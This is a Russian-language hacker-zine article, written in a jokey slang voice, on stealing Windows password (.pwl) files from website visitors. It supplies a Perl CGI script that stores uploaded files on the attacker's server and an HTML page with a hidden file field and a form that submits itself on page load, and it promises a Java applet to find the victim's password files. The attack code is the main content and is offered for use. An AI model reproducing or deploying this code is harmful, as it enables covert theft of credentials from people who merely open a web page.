Прива, люди идущие по Х
дороге. %)
В этой статье я вам
расскажу про то, как не ламерясь с SMB (NetBios)
сканерами и не мучая CGI-BU-и можно получить
пароли с других компов!
Всё очень просто, но для
начала нужна подготовочка %)
Иди купи себе ящик пива и
выпей его. Прёт? Ну в таком состоянии тебе
вообще за комп садиться нельзя. Иди
проспись. Проснулся? Голова болит? Купи ОДНУ
бутылку пива и пей её долго и медленно %) Ты
подумал и решил, что воду (да ещё на хмеле) ты
прошёл и решил пойти дальше. Ну если ты
действительно не боишься и хочешь надыбать
кучу паролей и быть вообще крутым пиплом то
слушай.
Что тебе потребуется? А
вот что:
- Знания Perl и HTML –
желательны. Должен же ты понимать, что
делаешь! - Сервак, который может
выложить у себя перл модуль с правами Root'a
– насчёт рута желательно. - Куча пива и серое
вещество! %)
Ну собственно что мы
делаем. Мы собираемся использовать такую
феньку в IE и NN которая называется "File
Uploading". Сначала мы сбацаем скрипт, который
будит производить саму скачку, потом
который будит определять ось и искать файлы
для самой скачки!
#!/usr/local/bin/perl -w
#Подключение стандартных библиотек
use strict 'refs';
use lib '..';
use CGI qw(:standard);
use CGI::Carp qw/fatalsToBrowser/;
use FileHandle;
print header(); # Голова HTML
print start_html(); # Начало HTML
#Проверяем, передан ли файл:
if (my $file = param('filename')) {
$aaaaaa = "$^T.pwl"; #Создаём уникальный файл в
дириктории скрипта,
#$^T – текущая дата в секундах с хрен знает
какого времени
$fh = new FileHandle; # Создаём ссылку на файл сервера
$fh->open("> $aaaaaa"); #Открываем файл
сервера для записи
binmode($fh); # Перехожим в режим BINARY
$fh->print(<$file>); # Копируем туда файл
$fh->close; # Закрываем ссылку на файл сервера
close $file; # закрываем файл с паролями
}else{
print "500 Server Error"; # если файл не передан,
пишем “500 Server error”
}
print end_html; # Конец HTML
Ну вот и всесь скрипт
Теперь создаём файл ala.html
или что-то подобное 🙂
<html><head><title>Redirect</title>
</head><body onload=javascript:document.fo.submit.click()>
<form method="post" action="/scripts/file_upload.pl"
enctype="multipart/form-data" name="fo">
<input type="file" name="filename"
size="45" style='visibility: hidden' />
<p /><input type="submit" name="submit" value="Process
File" style='visibility: hidden'/>
</form></body></html>
Ну вот и всё в принципе %)
Остаётся сущий пустячок…
Написать на java аплетик, который и будет
указывать сам путь к файлу на локальной
машине и пускать его в ala.html. А потом
расшифровать файл. Ты задаёшься вопросом…
А как я файл в форму закину? ДА ОЧЕНЬ ПРОСТО!
Напиши скрипт (или дождись моего), который
ищет файл, а потом имитирует ввод пути, с
клавы, в поле. Ну ты закончил извращать свои
серые клетки? Тогда иди выпей……ты этого
заслужил!
P.S. Пишу статью про сам java-аплет,
который определяет систему, ищет файлы
паролей и посылает их на perl скрипт %) ЖДИТЕ!
:))))
